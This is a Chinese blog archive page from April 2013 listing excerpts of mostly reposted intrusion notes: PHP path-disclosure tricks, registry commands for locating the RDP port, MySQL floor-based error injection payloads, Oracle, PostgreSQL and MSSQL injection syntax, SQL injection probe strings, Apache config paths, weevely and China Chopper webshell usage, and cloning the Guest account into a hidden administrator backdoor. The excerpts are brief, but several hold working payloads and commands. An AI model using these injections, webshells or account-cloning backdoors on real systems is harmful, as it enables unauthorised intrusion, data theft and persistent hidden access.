• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 众包
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
DemonSpider‘s BLOG
愿我的的剑芒<-|->永远闪耀!
博客园 | 首页 | 新随笔 | 新文章 | 联系 | 订阅 订阅 | 管理

04 2013 档案

 
php爆路径方法<转>
摘要:1、单引号爆路径 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com /news.php?id=149′ 2、错误参数值爆路径 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 www.xxx.com /researcharchive.php?id=-1 3、Google爆路径 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。 Site:2cto.com warning Site: 阅读全文
posted @ 2013-04-26 22:17 DemonSpider 阅读(275) 评论(0) 推荐(0)
命令行3389相关<转>
摘要:1.查看3389端口,很多变态管理员会修改为其它的:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 这条命令是查看远程桌面连接所开的端口是多少 一般默认显示是0xd3d 也就是33892.查看3389的svchost的进程的pid,这样可以结合netstat -ano来看3389的监听端口 【目的与1类似】tasklist /svc然后找如下(则远程进程号为1348):svchost.exe 1348 DcomLaunch, 阅读全文
posted @ 2013-04-26 13:46 DemonSpider 阅读(406) 评论(0) 推荐(0)
oracle注入,utl_http方法
摘要:大家都知道oracle比较大,11g的安装程序大约在1.4g左右,可能大家遇到oracle的库比较少,oracle+jsp的搭配的比较好... oracle系统库默认的用户有sys,system,internal,scott,前三个权限都是system权限.. 先说下数据库的注释:access支持null和注释; mssql支持--和;的注视;mysql支持/*的支持;oracle支持--的注视 这里也许大家说了如果mssql过滤了;注视,该怎么区别oracle和mssql数据库呢,如果是oracle的库,一旦出错的话,很多时候就会出现oracle.odbc等之类的存储过程出错的语句,也可以通 阅读全文
posted @ 2013-04-25 15:37 DemonSpider 阅读(1703) 评论(0) 推荐(0)
mysql 3种报错模式注入
摘要:1、通过floor报错可以通过如下一些利用代码and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)* 阅读全文
posted @ 2013-04-25 12:47 DemonSpider 阅读(302) 评论(0) 推荐(0)
在SQL注入中利用MySQL隐形的类型转换绕过WAF检测(转freebuf)
摘要:web应用一般采用基于表单的身份验证方式(页面雏形如下图所示),处理逻辑就是将表单中提交的用户名和密 码传递到后台数据库去查询,并根据查询结果判断是否通过身份验证。对于LAMP架构的web应用而言,处理逻辑采用PHP,后台数据库采用MySQL。而在这一处理过程,由于种种处理不善,会导致不少严重的漏洞,除去弱口令与暴力破解,最常见的就是SQL注入。SQL注入可以在SQLNuke——mysql 注入load_file Fuzz工具看到如何利用,而本篇博客的重点是利用MySQL隐形的类型转换绕过WAF的检测。下面使用实例来展示这一过程。实例包括2个脚本login.html与login.php,1张存 阅读全文
posted @ 2013-04-21 20:12 DemonSpider 阅读(283) 评论(0) 推荐(0)
Postgresql注入语法指南<转>
摘要:在注入中常用的几个注入语法通常有这么几个: --显示版本 --从已知表段字段爆数据 --列库 --列数据库中的表段 --列表段中的字段 --读取配置信息,例如数据库登陆账户和密码 --读写文件 那我就一个一个来讲这些Postgresql的语法是怎样的 --显示版本select version();union select 1,2,...n,version()//version()函数与MySQL的是一样的###########################################################################################回显数据举 阅读全文
posted @ 2013-04-11 20:09 DemonSpider 阅读(399) 评论(0) 推荐(0)
Apache 路径大全<转>
摘要:最常用的Apache路径有:/etc/httpd/conf/httpd.conf/usr/local/apache/conf/httpd.conf/usr/local/apache2/conf/httpd.conf###########################################################################################Apache 2.2 default layout (apache.org source package):ServerRoot :: /usr/local/apache2DocumentRoot :: 阅读全文
posted @ 2013-04-11 19:26 DemonSpider 阅读(325) 评论(0) 推荐(0)
渗透笔记之脚本入侵(ASP,PHP)<转>
摘要:简单判定有无漏洞: 粗略型:'复制代码 1. 数字型:and 1=1 and 1=2复制代码 2.字符型:' and '1'='1 ' and '1'='2复制代码 3.搜索型:%' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%复制代码 (PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”keyword”),赋值“KYO”到SQL语句中的时候即变为Select * from 表 阅读全文
posted @ 2013-04-11 19:16 DemonSpider 阅读(299) 评论(0) 推荐(0)
nginx是否存在文件类型解析漏洞(转)
摘要:网上疯传一个Nginx的所谓文件类型错误解析漏洞,但是真的就只有这样吗?漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一 个较为 严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持 php的nginx服务器。大家在到处利用这个有趣的漏洞的时候有没有想过真的是Nginx的Bug吗?真的是Nginx文件解析错误了吗?首先看看,小顿提供的解决 方案: 第一种:修改cgi.fix_pathinfo=0第 二种:if (. 阅读全文
posted @ 2013-04-11 14:42 DemonSpider 阅读(397) 评论(0) 推荐(0)
域渗透实录(转)
摘要:1.收集信息。 1-1.不论什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。 既然有了他的机器,那么翻翻他的电脑这是必要的,如果你说要怎么翻,你可以尝试熟悉他的电脑甚至比他本人还熟,那你就算了解详细了。一台个人用的电脑,从上面翻出与他自己相关的一些信息,和大量公司信息应该是没有问题的,除非,这是台新电脑。 1- 阅读全文
posted @ 2013-04-11 11:47 DemonSpider 阅读(239) 评论(0) 推荐(0)
MSSQL Injection Cheat Sheet(转)
摘要:MSSQL Injection Cheat SheetSome useful syntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This he 阅读全文
posted @ 2013-04-11 09:45 DemonSpider 阅读(352) 评论(0) 推荐(0)
weevely-------linux中的菜刀(转载)
摘要:weevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php // 生成一个密码为 ices 的php webshell.root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices// ./weevely.py http://*.com/webshell.php [password 阅读全文
posted @ 2013-04-05 19:35 DemonSpider 阅读(1864) 评论(0) 推荐(0)
黑客辅助工具:网站列表-中国菜刀之初现芳容(转载)
摘要:中国菜刀是实质上是一个网站数据库连接、管理程序!前提必须有网站数据库的用户名和密码(这个常关注我的博客,会找到解决方法的!),还有一个实用的小工具网站蜘蛛织出一张网站的目录结构。网站界面及操作第一步:第二步:帮助: 关于配置信息怎么填?(有一点难!) A) 数据库方面: PHP脚本: <T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 <H>主机地址<H> 主机地址可为机器名或IP地址,如localhost <U>数据库用户</U> 连接数据库的用户名,如root <P>数 阅读全文
posted @ 2013-04-05 09:07 DemonSpider 阅读(441) 评论(0) 推荐(0)
手工克隆管理员帐户(转)
摘要:帐号克隆是指通过技术手段让一个普通用户拥有和管理员一样的权限和桌面,而从外表看来这个普通用户还保持原来的属性,非常具有隐藏性,是一种常见的后门形式。 下面,我手工把guest帐户克隆为管理员(administrator),先来看下guest帐户在克隆前的状态和属性,如下图:图一图二 接着,打开注册表,找到如下键值:HKEY_LOCAL_MACHINE\SAM\SAM,现在SAM下面什么也没有。如图:图三原因是正常情况下,只有system才可以操作这个键值。现在我们来修改一下权限,让administrator拥有完全控制和权限。修改完成后,按"F5"刷新一下,现在在SAM下面 阅读全文
posted @ 2013-04-04 12:35 DemonSpider 阅读(489) 评论(0) 推荐(0)
 

公告


博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3